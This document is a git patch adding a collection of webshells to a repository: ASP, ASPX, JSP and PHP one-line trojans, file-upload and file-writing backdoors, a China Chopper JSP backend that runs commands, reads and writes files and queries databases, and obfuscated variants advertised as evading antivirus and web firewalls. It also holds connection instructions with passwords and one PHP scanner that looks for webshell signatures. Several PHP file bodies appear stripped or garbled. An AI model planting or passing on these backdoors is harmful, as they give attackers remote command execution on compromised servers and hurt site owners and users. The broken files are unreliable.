From a2c8423d1eb122be745654ed97cd1a9dda148efb Mon Sep 17 00:00:00 2001 From: tennc Date: Wed, 12 Mar 2014 09:45:11 +0800 Subject: [PATCH] update webshell with expdoor-com --- asp/Asp最新变形一句话.asp | 8 ++ asp/Expdoor.com ASP专用小马.asp | 37 ++++++++ asp/不带引号的Asp一句话.asp | 9 ++ aspx/Aspx一句话木马小集.aspx | 34 ++++++++ aspx/aspx变形一句话.aspx | 17 ++++ jsp/JSP菜刀一句话木马.jsp | 59 +++++++++++++ ...SP小马支持上传任意格式文件.jsp | 1 + php/PHP简单小马源码.php | 18 ++++ php/pHp一句话扫描脚本程序.php | 84 +++++++++++++++++++ php/一个过安全狗的pHp一句话.php | 10 +++ php/不带引号的pHp一句话.php | 10 +++ ...某论坛不含Get,Post的pHp一句话.php | 1 + ...的pHp小马穿插在正常页面中.php | 8 ++ php/某变异pHp一句话木马.php | 11 +++ php/牛X的pHp一句话.php | 1 + php/过各大杀软的pHp一句话.php | 7 ++ php/非常规的pHp一句话木马.php | 15 ++++ 17 files changed, 330 insertions(+) create mode 100644 asp/Asp最新变形一句话.asp create mode 100644 asp/Expdoor.com ASP专用小马.asp create mode 100644 asp/不带引号的Asp一句话.asp create mode 100644 aspx/Aspx一句话木马小集.aspx create mode 100644 aspx/aspx变形一句话.aspx create mode 100644 jsp/JSP菜刀一句话木马.jsp create mode 100644 jsp/新型JSP小马支持上传任意格式文件.jsp create mode 100644 php/PHP简单小马源码.php create mode 100644 php/pHp一句话扫描脚本程序.php create mode 100644 php/一个过安全狗的pHp一句话.php create mode 100644 php/不带引号的pHp一句话.php create mode 100644 php/国外某论坛不含Get,Post的pHp一句话.php create mode 100644 php/极其隐蔽的pHp小马穿插在正常页面中.php create mode 100644 php/某变异pHp一句话木马.php create mode 100644 php/牛X的pHp一句话.php create mode 100644 php/过各大杀软的pHp一句话.php create mode 100644 php/非常规的pHp一句话木马.php diff --git a/asp/Asp最新变形一句话.asp b/asp/Asp最新变形一句话.asp new file mode 100644 index 0000000..63bb24b --- /dev/null +++ b/asp/Asp最新变形一句话.asp @@ -0,0 +1,8 @@ +<% +Function MorfiCoder(Code) +MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) +End Function +Execute MorfiCoder(")/*/z/*/(tseuqer lave") +%> + +password:z \ No newline at end of file diff --git a/asp/Expdoor.com ASP专用小马.asp b/asp/Expdoor.com ASP专用小马.asp new file mode 100644 index 0000000..a8c62f9 --- /dev/null +++ b/asp/Expdoor.com ASP专用小马.asp @@ -0,0 +1,37 @@ +Expdoor.com ASP专用小马 +
+
该脚本仅供学习使用,请勿用于非法!如果发现威胁文件,请到www.Expdoor.com解除你的危险状况 + + +
+
+ + +
+<% +dim s +if request("action")="set" then +Text=request("Text") +FileName=request("FileName") +set fs=server.CreateObject("Scripting.FileSystemObject") '创建FSO组件 +set file=fs.OpenTextFile(server.MapPath(FileName),8,True) '创建FileName指定的文件 +file.writeline Text '把TEXT逐行写入到文件中,如果没有写 + +权限,会造成操作失败 +file.close '关闭file +set file=nothing '释放 +set fs=nothing '释放 +response.write ("") '返回到客户端执行提示保存成功 +end if +%> \ No newline at end of file diff --git a/asp/不带引号的Asp一句话.asp b/asp/不带引号的Asp一句话.asp new file mode 100644 index 0000000..e4edb5d --- /dev/null +++ b/asp/不带引号的Asp一句话.asp @@ -0,0 +1,9 @@ +发现有些狗特别喜欢在引号前面加“\” + +所以找了一个不带引号的Asp一句话 + +//Asp的 + +服务端: <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %> + +菜刀配置地址填: http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave 密码填0 \ No newline at end of file diff --git a/aspx/Aspx一句话木马小集.aspx b/aspx/Aspx一句话木马小集.aspx new file mode 100644 index 0000000..9839b54 --- /dev/null +++ b/aspx/Aspx一句话木马小集.aspx @@ -0,0 +1,34 @@ +1k 的 + +<%@ Page Language="VB" %> +<%@ import Namespace="System.IO" %> + + +--------------------------- +.net的一句话 + +<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%> + + + + + + ASPX one line Code Client by amxku + + +
+ +

+ + + diff --git a/aspx/aspx变形一句话.aspx b/aspx/aspx变形一句话.aspx new file mode 100644 index 0000000..676b4a3 --- /dev/null +++ b/aspx/aspx变形一句话.aspx @@ -0,0 +1,17 @@ + +<% +popup(popup(System.Text.Encoding.GetEncoding(65001). + +GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); + +%> + +password:z \ No newline at end of file diff --git a/jsp/JSP菜刀一句话木马.jsp b/jsp/JSP菜刀一句话木马.jsp new file mode 100644 index 0000000..36388e8 --- /dev/null +++ b/jsp/JSP菜刀一句话木马.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="sky"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/新型JSP小马支持上传任意格式文件.jsp b/jsp/新型JSP小马支持上传任意格式文件.jsp new file mode 100644 index 0000000..2f5e7b3 --- /dev/null +++ b/jsp/新型JSP小马支持上传任意格式文件.jsp @@ -0,0 +1 @@ +<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%> \ No newline at end of file diff --git a/php/PHP简单小马源码.php b/php/PHP简单小马源码.php new file mode 100644 index 0000000..7a9b536 --- /dev/null +++ b/php/PHP简单小马源码.php @@ -0,0 +1,18 @@ +OK!"; +else +echo "Error!"; +} +?> + + PHP小马 - ExpDoor.com + +

+
+
+ +

\ No newline at end of file diff --git a/php/pHp一句话扫描脚本程序.php b/php/pHp一句话扫描脚本程序.php new file mode 100644 index 0000000..e4c1981 --- /dev/null +++ b/php/pHp一句话扫描脚本程序.php @@ -0,0 +1,84 @@ + -1 || strpos($name,'%00') > -1 || strpos($name,'/') > -1) { + echo '特征 '.$path.'
'; flush(); ob_flush(); + } else { + if(!preg_match($exs,$name)) continue; + if(filesize($path) > 10000000) continue; + $fp = fopen($path,'r'); + $code = fread($fp,filesize($path)); + fclose($fp); + if(empty($code)) continue; + foreach($matches as $matche) { + $array = array(); + preg_match($matche,$code,$array); + if(!$array) continue; + if(strpos($array[0],"\x24\x74\x68\x69\x73\x2d\x3e")) continue; + $len = strlen($array[0]); + if($len > 6 && $len < 200) { + echo '特征 '.$path.'
'; + flush(); ob_flush(); break; + } + } + unset($code,$array); + } + } + closedir($handle); + return true; +} + +function strdir($str) { return str_replace(array('\\','//','//'),array('/','/','/'),chop($str)); } + +echo '
'; +echo '路径:
'; +echo '后缀:
'; +echo '操作:
'; +echo '
'; + +if(file_exists($_POST['dir']) && $_POST['exs']) { + $dir = strdir($_POST['dir'].'/'); + $exs = '/('.str_replace('.','\\.',$_POST['exs']).')/i'; + echo antivirus($dir,$exs,$matches) ? '
扫描完毕' : '
扫描中断'; +} +?> \ No newline at end of file diff --git a/php/一个过安全狗的pHp一句话.php b/php/一个过安全狗的pHp一句话.php new file mode 100644 index 0000000..e117191 --- /dev/null +++ b/php/一个过安全狗的pHp一句话.php @@ -0,0 +1,10 @@ + + + + + diff --git a/php/不带引号的pHp一句话.php b/php/不带引号的pHp一句话.php new file mode 100644 index 0000000..55b5891 --- /dev/null +++ b/php/不带引号的pHp一句话.php @@ -0,0 +1,10 @@ +发现有些狗特别喜欢在引号前面加“\” + +所以找了一个不带引号的pHp一句话 + + + + +//pHp的 + + 密码1 \ No newline at end of file diff --git a/php/国外某论坛不含Get,Post的pHp一句话.php b/php/国外某论坛不含Get,Post的pHp一句话.php new file mode 100644 index 0000000..47a4022 --- /dev/null +++ b/php/国外某论坛不含Get,Post的pHp一句话.php @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/php/极其隐蔽的pHp小马穿插在正常页面中.php b/php/极其隐蔽的pHp小马穿插在正常页面中.php new file mode 100644 index 0000000..01ef698 --- /dev/null +++ b/php/极其隐蔽的pHp小马穿插在正常页面中.php @@ -0,0 +1,8 @@ + +
\ No newline at end of file diff --git a/php/某变异pHp一句话木马.php b/php/某变异pHp一句话木马.php new file mode 100644 index 0000000..563e8aa --- /dev/null +++ b/php/某变异pHp一句话木马.php @@ -0,0 +1,11 @@ +转载自:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316 + +源码<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?> + + + +连接方法-> +.php?u=一句话,然后菜马连一句话密码!把配上去 + diff --git a/php/牛X的pHp一句话.php b/php/牛X的pHp一句话.php new file mode 100644 index 0000000..b926df7 --- /dev/null +++ b/php/牛X的pHp一句话.php @@ -0,0 +1 @@ + diff --git a/php/过各大杀软的pHp一句话.php b/php/过各大杀软的pHp一句话.php new file mode 100644 index 0000000..68b2e3a --- /dev/null +++ b/php/过各大杀软的pHp一句话.php @@ -0,0 +1,7 @@ +/********************** +无视当前各大杀软,安全狗,D盾,一流监控! + +pHp一句话,密码 1 +**********************/ + + \ No newline at end of file diff --git a/php/非常规的pHp一句话木马.php b/php/非常规的pHp一句话木马.php new file mode 100644 index 0000000..8434890 --- /dev/null +++ b/php/非常规的pHp一句话木马.php @@ -0,0 +1,15 @@ + + + 带md5并可植入任意文件 + + + +shell.php?qid=zxexp 密码page \ No newline at end of file